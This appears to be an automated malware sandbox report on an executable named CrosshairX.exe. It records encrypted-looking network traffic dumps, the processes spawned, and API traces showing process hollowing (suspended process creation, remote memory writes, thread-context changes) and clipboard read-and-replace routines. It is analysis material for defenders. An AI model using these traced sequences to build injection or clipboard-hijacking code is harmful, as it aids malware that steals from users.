2025-01-05 19:00:08 UTC	1369	IN	Data Raw: 6a 43 50 56 31 2b 6b 47 4b 33 2f 63 37 6a 71 39 6b 34 79 52 6d 6e 39 6e 77 30 31 42 45 4f 43 75 61 43 62 31 6d 52 77 48 71 43 50 2f 4e 4b 43 39 35 77 42 66 5a 2f 53 77 42 4f 53 33 6d 37 53 2f 47 68 50 65 4b 46 56 67 35 62 77 65 55 4d 48 30 47 6a 53 6f 46 76 64 48 76 2b 2f 37 47 43 4a 71 70 72 4d 50 2f 63 6d 4a 6b 64 59 74 49 2b 6b 4d 58 6d 48 52 30 55 74 43 72 34 49 39 4e 4e 4d 63 37 6d 48 2b 77 5a 73 57 49 45 54 51 38 52 37 6b 6a 61 6d 4b 74 41 39 75 77 69 78 65 62 39 2b 5a 41 6d 76 76 73 6b 67 6e 6c 42 6e 68 49 74 58 68 38 6b 30 72 51 4d 44 47 4e 72 65 48 76 34 2b 36 65 44 6e 70 4d 31 64 74 77 72 4a 38 53 4f 53 72 4c 33 79 46 44 66 70 33 31 37 4f 59 56 48 52 76 33 4b 6f 42 32 35 50 66 6a 4c 4a 6c 4d 66 30 76 55 78 43 2b 68 47 51 6e 77 70 41 61 4b 4a 59 Data Ascii: jCPV1+kGK3/c7jq9k4yRmn9nw01BEOCuaCb1mRwHqCP/NKC95wBfZ/SwBOS3m7S/GhPeKFVg5bweUMH0GjSoFvdHv+/7GCJqprMP/cmJkdYtI+kMXmHR0UtCr4I9NNMc7mH+wZsWIETQ8R7kjamKtA9uwixeb9+ZAmvvskgnlBnhItXh8k0rQMDGNreHv4+6eDnpM1dtwrJ8SOSrL3yFDfp317OYVHRv3KoB25PfjLJlMf0vUxC+hGQnwpAaKJY
2025-01-05 19:00:08 UTC	1369	IN	Data Raw: 66 36 65 4a 79 70 31 6f 4d 55 36 7a 59 65 47 37 36 67 65 44 63 39 45 55 58 54 4b 74 48 74 72 71 37 55 55 42 70 73 36 31 6c 36 6c 76 65 73 45 54 79 71 72 78 44 33 49 6d 64 65 6b 76 68 73 44 75 42 4e 36 61 38 43 32 5a 6c 4c 56 6c 6a 55 6e 74 58 7a 48 57 73 6e 6f 36 56 55 6c 4d 2f 54 76 49 61 54 4a 75 37 44 65 47 41 75 6c 49 54 5a 53 33 37 64 7a 4c 66 71 4e 51 67 36 78 4c 63 64 73 6f 50 50 4e 56 6d 64 58 78 72 4d 38 33 36 2f 66 6e 49 63 66 4e 66 77 50 61 47 62 75 79 52 35 32 7a 36 59 70 42 4c 31 6a 2f 7a 54 53 77 63 59 4d 64 55 6a 70 73 53 75 32 6a 64 79 61 75 67 67 74 34 30 78 66 63 64 65 37 45 46 62 52 68 7a 45 65 6c 47 66 57 64 4e 72 2b 32 42 64 57 4d 4b 72 45 43 4e 50 53 31 35 75 39 44 54 4f 79 42 30 6c 30 32 63 78 48 66 63 36 4e 4d 77 4f 74 47 66 56 56 Data Ascii: f6eJyp1oMU6zYeG76geDc9EUXTKtHtrq7UUBps61l6lvesETyqrxD3ImdekvhsDuBN6a8C2ZlLVljUntXzHWsno6VUlM/TvIaTJu7DeGAulITZS37dzLfqNQg6xLcdsoPPNVmdXxrM836/fnIcfNfwPaGbuyR52z6YpBL1j/zTSwcYMdUjpsSu2jdyauggt40xfcde7EFbRhzEelGfWdNr+2BdWMKrECNPS15u9DTOyB0l02cxHfc6NMwOtGfVV
2025-01-05 19:00:08 UTC	1369	IN	Data Raw: 31 44 61 61 72 6f 57 64 65 35 32 62 79 72 43 42 4c 4f 49 54 5a 56 39 49 67 64 4b 38 69 49 48 44 2b 52 49 39 49 6f 2b 2b 71 61 46 33 31 52 39 39 63 4e 33 70 57 4e 6a 61 59 62 45 4d 41 75 54 30 33 4c 68 6b 45 6d 31 66 67 75 42 4e 52 6e 38 30 65 2f 76 4f 73 44 57 57 4c 6c 78 44 66 62 68 5a 36 58 33 78 41 74 76 67 55 70 53 37 6e 4c 58 55 72 74 6c 79 30 74 30 41 50 4f 51 74 50 79 35 56 52 56 51 75 54 37 46 4d 32 5a 68 76 57 39 65 41 33 73 52 57 70 41 36 49 6c 46 64 38 2f 31 48 41 53 6d 4a 38 39 6f 70 66 54 6b 47 6c 68 42 2f 4d 30 46 33 71 69 38 6b 49 6f 70 45 38 30 5a 52 51 72 34 6c 45 55 6d 74 59 31 4e 46 59 59 32 37 69 6a 4d 71 38 59 49 52 6c 33 47 30 7a 7a 54 30 74 69 5a 6d 68 41 6b 38 78 4e 75 55 62 2b 4c 65 31 2f 71 39 43 67 43 6a 43 32 62 4b 64 62 48 38 Data Ascii: 1DaaroWde52byrCBLOITZV9IgdK8iIHD+RI9Io++qaF31R99cN3pWNjaYbEMAuT03LhkEm1fguBNRn80e/vOsDWWLlxDfbhZ6X3xAtvgUpS7nLXUrtly0t0APOQtPy5VRVQuT7FM2ZhvW9eA3sRWpA6IlFd8/1HASmJ89opfTkGlhB/M0F3qi8kIopE80ZRQr4lEUmtY1NFYY27ijMq8YIRl3G0zzT0tiZmhAk8xNuUb+Le1/q9CgCjC2bKdbH8
2025-01-05 19:00:08 UTC	1369	IN	Data Raw: 66 77 69 69 39 73 74 61 51 71 33 6b 77 30 43 35 71 64 76 71 5a 53 6c 48 35 73 52 49 47 6a 58 7a 45 53 65 4c 49 33 69 42 63 53 50 33 32 47 2b 79 36 74 62 53 4b 42 79 33 39 4f 46 68 57 79 37 70 64 4c 4e 7a 76 53 7a 71 67 4f 59 68 49 31 75 6e 67 45 43 74 4a 2f 2b 41 42 36 4c 65 56 67 73 46 35 49 63 73 62 58 48 33 65 6d 57 64 4e 31 5a 55 77 47 4a 73 63 34 43 6e 2b 35 2b 46 52 63 55 6a 41 75 53 33 42 6b 35 32 77 74 77 73 65 35 6a 70 37 59 76 53 58 62 45 66 6a 69 41 4e 37 6b 42 2f 75 56 65 69 33 77 51 39 58 64 63 50 4c 49 62 7a 4c 68 2b 37 63 48 68 37 6a 4c 6d 4e 70 36 71 30 52 57 72 47 75 4f 44 37 57 66 63 78 2b 33 76 33 48 4f 31 52 74 71 38 63 69 74 73 58 65 69 74 73 68 4a 65 67 58 65 47 44 68 74 42 70 64 31 49 38 53 5a 37 63 48 69 47 72 53 35 73 4d 79 64 54 Data Ascii: fwii9staQq3kw0C5qdvqZSlH5sRIGjXzESeLI3iBcSP32G+y6tbSKBy39OFhWy7pdLNzvSzqgOYhI1ungECtJ/+AB6LeVgsF5IcsbXH3emWdN1ZUwGJsc4Cn+5+FRcUjAuS3Bk52wtwse5jp7YvSXbEfjiAN7kB/uVei3wQ9XdcPLIbzLh+7cHh7jLmNp6q0RWrGuOD7Wfcx+3v3HO1Rtq8citsXeitshJegXeGDhtBpd1I8SZ7cHiGrS5sMydT
2025-01-05 19:00:08 UTC	1369	IN	Data Raw: 78 34 36 32 6c 62 30 61 4f 73 55 6b 4b 33 65 35 74 57 4a 36 33 4f 38 31 4b 59 67 63 37 30 76 6a 77 38 38 78 59 45 48 53 74 6a 54 62 79 4b 79 73 6c 43 59 34 32 54 5a 38 59 4d 69 62 55 53 62 46 67 6a 6f 6f 68 43 48 4b 51 62 76 76 6c 6a 64 68 63 4d 76 49 56 76 75 2b 71 2b 6d 69 42 79 50 59 4d 56 78 6e 2b 73 70 6c 63 63 4b 47 4b 52 53 59 43 66 46 4a 70 38 50 74 44 32 5a 4a 6f 38 67 39 79 4c 4f 44 69 70 51 61 46 4c 67 54 65 6e 44 6d 74 56 42 63 36 36 51 31 42 4b 63 4e 78 58 2f 59 2f 75 67 6e 5a 58 66 47 39 51 71 36 79 61 53 63 6d 6e 6b 36 30 42 4a 46 43 73 47 52 59 79 33 4e 2b 54 6b 63 67 43 6a 62 53 4d 48 32 35 78 42 57 55 4b 50 69 43 4e 33 45 33 37 69 6a 50 44 33 74 4c 56 31 70 2b 35 4a 74 57 2b 57 43 4d 78 44 4f 4b 70 70 4f 35 50 33 6c 49 48 39 4b 33 63 49 Data Ascii: x462lb0aOsUkK3e5tWJ63O81KYgc70vjw88xYEHStjTbyKyslCY42TZ8YMibUSbFgjoohCHKQbvvljdhcMvIVvu+q+miByPYMVxn+splccKGKRSYCfFJp8PtD2ZJo8g9yLODipQaFLgTenDmtVBc66Q1BKcNxX/Y/ugnZXfG9Qq6yaScmnk60BJFCsGRYy3N+TkcgCjbSMH25xBWUKPiCN3E37ijPD3tLV1p+5JtW+WCMxDOKppO5P3lIH9K3cI
2025-01-05 19:00:08 UTC	1369	IN	Data Raw: 71 7a 58 4d 68 72 5a 4e 58 34 55 79 73 6b 66 4b 4f 65 75 4d 69 66 57 4f 4f 64 64 2f 50 54 49 4c 58 35 68 70 72 67 5a 74 70 6d 6d 72 74 6b 4c 59 73 67 78 4b 55 50 6a 68 47 42 6f 73 34 55 44 42 59 51 49 39 6e 6e 6d 39 74 38 68 63 47 7a 48 39 46 37 43 75 72 65 59 31 6e 77 4e 75 52 4d 71 59 62 7a 4f 51 48 44 7a 68 42 41 4a 6c 78 36 49 61 50 72 50 38 6b 31 77 55 64 62 70 57 73 47 76 6d 76 57 62 4a 52 33 7a 4e 31 59 53 36 62 46 7a 65 39 69 36 43 79 48 4b 4b 73 42 4c 79 4e 66 6c 42 32 52 54 77 74 4a 57 34 62 65 36 6a 4b 41 68 41 66 6b 75 55 55 4b 38 75 52 34 6f 74 71 63 56 43 36 31 2b 34 47 33 53 31 50 4a 4e 52 6c 7a 6b 79 44 53 38 68 39 32 51 67 67 73 7a 2f 67 51 71 5a 50 36 47 52 31 50 52 70 52 34 6c 69 43 33 75 4c 76 2f 70 35 43 35 46 4e 38 58 76 4f 4f 32 35 Data Ascii: qzXMhrZNX4UyskfKOeuMifWOOdd/PTILX5hprgZtpmmrtkLYsgxKUPjhGBos4UDBYQI9nnm9t8hcGzH9F7CureY1nwNuRMqYbzOQHDzhBAJlx6IaPrP8k1wUdbpWsGvmvWbJR3zN1YS6bFze9i6CyHKKsBLyNflB2RTwtJW4be6jKAhAfkuUUK8uR4otqcVC61+4G3S1PJNRlzkyDS8h92Qggsz/gQqZP6GR1PRpR4liC3uLv/p5C5FN8XvOO25
2025-01-05 19:00:08 UTC	1369	IN	Data Raw: 35 75 34 7a 6c 56 54 39 69 66 47 53 33 6b 74 41 77 55 68 43 2f 62 64 4d 66 2b 2f 6c 52 45 56 2f 4b 77 42 38 32 53 6e 34 53 33 4d 68 57 36 47 6d 74 74 36 62 4e 54 57 75 54 33 4c 51 6d 39 59 2f 38 30 36 50 33 71 45 6b 46 48 2b 2b 6f 65 34 38 71 58 72 36 6b 51 49 2b 59 34 64 56 66 75 7a 45 74 33 37 34 45 6a 4f 64 51 30 38 45 6e 66 31 4e 6b 48 5a 32 62 37 37 77 6a 41 31 74 36 62 71 42 73 54 7a 67 6c 52 51 64 37 50 62 30 72 53 6c 45 73 4a 6a 68 6e 6b 53 62 75 76 32 79 35 78 51 66 75 34 44 64 72 49 6f 62 75 67 4d 68 76 5a 45 30 70 47 77 49 78 38 54 38 2b 7a 41 51 4b 73 42 4f 78 5a 32 64 54 68 41 47 6f 31 77 4f 5a 63 76 72 72 59 36 4e 67 59 42 62 67 46 57 33 33 71 78 6c 78 36 36 71 45 69 65 6f 6c 34 38 6d 79 68 36 66 59 4d 64 46 54 56 77 69 58 6e 73 61 61 6e 6d Data Ascii: 5u4zlVT9ifGS3ktAwUhC/bdMf+/lREV/KwB82Sn4S3MhW6Gmtt6bNTWuT3LQm9Y/806P3qEkFH++oe48qXr6kQI+Y4dVfuzEt374EjOdQ08Enf1NkHZ2b77wjA1t6bqBsTzglRQd7Pb0rSlEsJjhnkSbuv2y5xQfu4DdrIobugMhvZE0pGwIx8T8+zAQKsBOxZ2dThAGo1wOZcvrrY6NgYBbgFW33qxlx66qEieol48myh6fYMdFTVwiXnsaanm
2025-01-05 19:00:08 UTC	1369	IN	Data Raw: 76 62 52 66 34 78 32 4e 6b 34 37 55 7a 4b 4e 67 70 38 30 65 2f 77 75 73 30 51 47 48 6a 78 53 48 2f 71 64 36 57 6a 52 49 61 7a 53 31 56 66 62 79 77 55 46 71 78 6c 7a 6f 76 30 41 76 45 61 71 66 32 77 43 6c 71 4d 66 58 4a 58 2b 53 68 77 4f 61 37 47 41 48 41 54 33 70 6f 75 36 68 35 54 76 53 34 48 44 75 41 47 64 64 5a 31 62 62 41 4d 6b 52 6d 30 62 56 65 37 72 69 64 72 36 30 70 4d 4c 30 61 4c 30 50 56 73 6e 55 78 2b 70 49 39 48 59 38 56 39 6d 47 6b 74 4a 63 42 49 45 53 67 77 78 76 6d 7a 4e 32 4b 69 41 74 75 37 44 78 52 45 4e 2b 4f 52 47 75 79 69 67 49 46 6c 41 2b 53 49 73 6e 79 68 51 42 57 56 2f 4c 6c 41 38 75 74 67 34 71 5a 49 44 54 62 48 6c 34 56 77 61 31 6e 55 4b 75 71 53 7a 32 67 4b 63 64 63 2f 66 57 59 4e 33 31 4c 75 4c 55 68 76 4d 79 46 67 73 46 2f 48 74 Data Ascii: vbRf4x2Nk47UzKNgp80e/wus0QGHjxSH/qd6WjRIazS1VfbywUFqxlzov0AvEaqf2wClqMfXJX+ShwOa7GAHAT3pou6h5TvS4HDuAGddZ1bbAMkRm0bVe7ridr60pML0aL0PVsnUx+pI9HY8V9mGktJcBIESgwxvmzN2KiAtu7DxREN+ORGuyigIFlA+SIsnyhQBWV/LlA8utg4qZIDTbHl4Vwa1nUKuqSz2gKcdc/fWYN31LuLUhvMyFgsF/Ht

Target ID:	0
Start time:	13:59:52
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\CrosshairX.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CrosshairX.exe"
Imagebase:	0xd0000
File size:	369'664 bytes
MD5 hash:	69BD9BE788D02879474D95C9A50BEB16
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:59:52
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:59:53
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\CrosshairX.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\CrosshairX.exe"
Imagebase:	0x140000
File size:	369'664 bytes
MD5 hash:	69BD9BE788D02879474D95C9A50BEB16
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:59:53
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\CrosshairX.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CrosshairX.exe"
Imagebase:	0xd40000
File size:	369'664 bytes
MD5 hash:	69BD9BE788D02879474D95C9A50BEB16
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	13:59:53
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7320 -s 928
Imagebase:	0x420000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	60%
Total number of Nodes:	15
Total number of Limit Nodes:	1

Executed Functions

Function 02647F39 Relevance: 42.3, APIs: 11, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02647EAB,02647E9B), ref: 026480D1
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 026480E4
Wow64GetThreadContext.KERNEL32(00000088,00000000), ref: 02648102
ReadProcessMemory.KERNELBASE(0000008C,?,02647EEF,00000004,00000000), ref: 02648126
VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 02648151
TerminateProcess.KERNELBASE(0000008C,00000000), ref: 02648170
WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 026481A9
WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 026481F4
WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 02648232
Wow64SetThreadContext.KERNEL32(00000088,02600000), ref: 0264826E
ResumeThread.KERNELBASE(00000088), ref: 0264827D

Strings

ress, xrefs: 02647FC3
aryA, xrefs: 02647F7F
VirtualAllocEx, xrefs: 02648039
TerminateProcess, xrefs: 02648160
GetThreadContext, xrefs: 02648013
ResumeThread, xrefs: 02648075
GetP, xrefs: 02647FBB
VirtualAlloc, xrefs: 02648000
CreateProcessW, xrefs: 02647FED
ReadProcessMemory, xrefs: 02648026
Load, xrefs: 02647F77
SetThreadContext, xrefs: 0264805F
WriteProcessMemory, xrefs: 0264804C

Memory Dump Source

Source File: 00000000.00000002.1834738410.0000000002647000.00000040.00000800.00020000.00000000.sdmp, Offset: 02647000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2647000_CrosshairX.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-232383841
Opcode ID: fb7b6201eaedee4635523f204421a04f1d545bd862ac4ba91bf339366d457fff
Instruction ID: 12d392644e1228700a6a710296ead335ccdd27bc5b5e769c9af6887614caed2e
Opcode Fuzzy Hash: fb7b6201eaedee4635523f204421a04f1d545bd862ac4ba91bf339366d457fff
Instruction Fuzzy Hash: 2BB1F97660068AAFDB60CF68CC80BDAB3A5FF88714F158114EA0CAB341D774FA51CB94

Function 026480B6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02647EAB,02647E9B), ref: 026480D1
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 026480E4
Wow64GetThreadContext.KERNEL32(00000088,00000000), ref: 02648102
ReadProcessMemory.KERNELBASE(0000008C,?,02647EEF,00000004,00000000), ref: 02648126
VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 02648151
TerminateProcess.KERNELBASE(0000008C,00000000), ref: 02648170
WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 026481A9
WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 026481F4
WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 02648232
Wow64SetThreadContext.KERNEL32(00000088,02600000), ref: 0264826E
ResumeThread.KERNELBASE(00000088), ref: 0264827D

Strings

TerminateProcess, xrefs: 02648160

Memory Dump Source

Source File: 00000000.00000002.1834738410.0000000002647000.00000040.00000800.00020000.00000000.sdmp, Offset: 02647000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2647000_CrosshairX.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: TerminateProcess
API String ID: 2440066154-2873147277
Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction ID: d577f534c8cfbff9f7a67abe6c618e85d79487694d8aada1fcc4cdb2a8d3f01d
Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction Fuzzy Hash: 10312F72240686ABD734CF94CC51FEA73A5BFC8B15F148509EB09AF680C7B4BA018B94

Function 009A29D7 Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03643588,?,?,?,?,?,?,?,?,000D59C4,00000000,?,009A0CBE,?,00000040), ref: 009A2A69

Memory Dump Source

Source File: 00000000.00000002.1834369768.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_CrosshairX.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 151d3480cf927888dfb6ced5c0bbe78a3b19ea8a8a243add1b8f94e41e40f7d0
Instruction ID: f8d39e16160de63c8456bdddbb86f57460ec5799c5db28d69a54f233af6cc424
Opcode Fuzzy Hash: 151d3480cf927888dfb6ced5c0bbe78a3b19ea8a8a243add1b8f94e41e40f7d0
Instruction Fuzzy Hash: 452128B19057989FCB11CFA9C884ADEFFB4FF09310F14816AE848A7251C3746944CFA5

Function 009A0668 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03643588,?,?,?,?,?,?,?,?,000D59C4,00000000,?,009A0CBE,?,00000040), ref: 009A2A69

Memory Dump Source

Source File: 00000000.00000002.1834369768.00000000009A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_CrosshairX.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 62f878679981b2f24bfadc2a60fc7eaf7d3ed3d8cbd10009b783b56654759b5a
Instruction ID: d14a016c5a63ec1141a026ad2cc7cb35b6bc0607dc72e80f34dd38b087d5258b
Opcode Fuzzy Hash: 62f878679981b2f24bfadc2a60fc7eaf7d3ed3d8cbd10009b783b56654759b5a
Instruction Fuzzy Hash: A321E0B1901619AFCB10DF9AC884ADEFBF4FB49310F10852AE918A7240C374A954CFE5

Analysis Process: CrosshairX.exePID: 7396, Parent PID: 7320COMMON

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	4.4%
Signature Coverage:	64.8%
Total number of Nodes:	366
Total number of Limit Nodes:	26

Executed Functions

Function 0043DCC0 Relevance: 32.4, APIs: 11, Strings: 7, Instructions: 917
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(F7F6F5C9,00000000,00000001,?,00000000), ref: 0043E1AC
SysAllocString.OLEAUT32(B3FDB1E2), ref: 0043E21C
CoSetProxyBlanket.COMBASE(F7F6F5C9,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043E25A
SysAllocString.OLEAUT32(41114719), ref: 0043E2D3
SysAllocString.OLEAUT32(D218DC08), ref: 0043E36B
VariantInit.OLEAUT32(?), ref: 0043E3E4
SysFreeString.OLEAUT32(00000000), ref: 0043E702
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043E737

Strings

[R, xrefs: 0043E416
8e, xrefs: 0043E162, 0043E0D2
mbc`, xrefs: 0043DD4B
}|AP, xrefs: 0043E298
8e, xrefs: 0043E406
_F, xrefs: 0043E483, 0043E487
j|AP, xrefs: 0043E2C6

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
String ID: 8e$8e$[R$_F$j|AP$mbc`$}|AP
API String ID: 505850577-2278612819
Opcode ID: 343581a6233ef45cec74f1418d82f179359f82717aa78b65fc48aa8c258b27f1
Instruction ID: d9e9cfcbe5730953a4702a136d8f052b4a70f9d97d2cf84d869405414de4b765
Opcode Fuzzy Hash: 343581a6233ef45cec74f1418d82f179359f82717aa78b65fc48aa8c258b27f1
Instruction Fuzzy Hash: 2D62EF716093409BE324CF29C89176FBBE1EBD9714F18892EE4D99B381D778D805CB86

Function 03931000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 03931032
OpenClipboard.USER32(00000000), ref: 0393103C
GetClipboardData.USER32(0000000D), ref: 0393104C
GlobalLock.KERNEL32(00000000), ref: 0393105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 03931090
GlobalLock.KERNEL32 ref: 039310A0
GlobalUnlock.KERNEL32 ref: 039310C1
EmptyClipboard.USER32 ref: 039310CB
SetClipboardData.USER32(0000000D), ref: 039310D6
GlobalFree.KERNEL32 ref: 039310E3
GlobalUnlock.KERNEL32(?), ref: 039310ED
CloseClipboard.USER32 ref: 039310F3
GetClipboardSequenceNumber.USER32 ref: 039310F9

Memory Dump Source

Source File: 00000003.00000002.2909558503.0000000003931000.00000020.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true

Associated: 00000003.00000002.2909539499.0000000003930000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2909579143.0000000003932000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3930000_CrosshairX.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: fee4823fade66ac814f470cddd4964148de9e329380aaf8db0342f1e4fec9420
Instruction ID: 95a3c974fcd728ce401594aeb964072cb385e5fec6b6402c86c8621bd8cfd12f
Opcode Fuzzy Hash: fee4823fade66ac814f470cddd4964148de9e329380aaf8db0342f1e4fec9420
Instruction Fuzzy Hash: 4E219BF16083509BDB207BB1EC09B9BB7ACFF05BC1F080824F5C5DA164E7218800C762

Function 00426970 Relevance: 18.0, APIs: 3, Strings: 7, Instructions: 550
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00426A95
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00426B29

Strings

[[, xrefs: 00426FDE
Vh, xrefs: 004270C1, 004270C5
_fUd, xrefs: 00426F70
f, xrefs: 00426D35
pe, xrefs: 00426D2D
FR, xrefs: 00426FD6
es, xrefs: 00426D25

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: FR$Vh$[[$_fUd$es$f$pe
API String ID: 237503144-2729952446
Opcode ID: ec5c5c38ab9fffbfb462dae7f2305f9fe11cb4ff9aca71e97a5880e0c58aee11
Instruction ID: 4c2c877a7502ecb994cb0758218946ddc79209b00efc6af2b020780c94e1ecca
Opcode Fuzzy Hash: ec5c5c38ab9fffbfb462dae7f2305f9fe11cb4ff9aca71e97a5880e0c58aee11
Instruction Fuzzy Hash: 08129AB564C3008BE318DF65D89176FBBE1EFC5308F09892DE5958B391D778C6098B8A

Function 00412BE0 Relevance: 12.9, APIs: 3, Strings: 3, Instructions: 2382COMMON

Download Yara Rule

Strings

=<, xrefs: 00414284
`, xrefs: 00413DB5
D, xrefs: 00414A8B

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: =<$D$`
API String ID: 0-4189016937
Opcode ID: f97235cd33df9153f77dcd854faf4133f454f993d5d2a842fff3847dbb694d49
Instruction ID: 731aceeec7928a5a15e291f49b080e69f7c6e20b825ce8e3401e3ca08f7f39c9
Opcode Fuzzy Hash: f97235cd33df9153f77dcd854faf4133f454f993d5d2a842fff3847dbb694d49
Instruction Fuzzy Hash: E82308B19087508FDB10DF38C84539EBFB1AF56314F1886ADD4999B3C2D33A8946CB96

Function 0041616F Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 456
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

}K8E, xrefs: 004167C6
6GvA, xrefs: 0041674A
8, xrefs: 004162B2
t, xrefs: 0041655D
f=}A, xrefs: 0041668F
{=}A, xrefs: 00416661

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

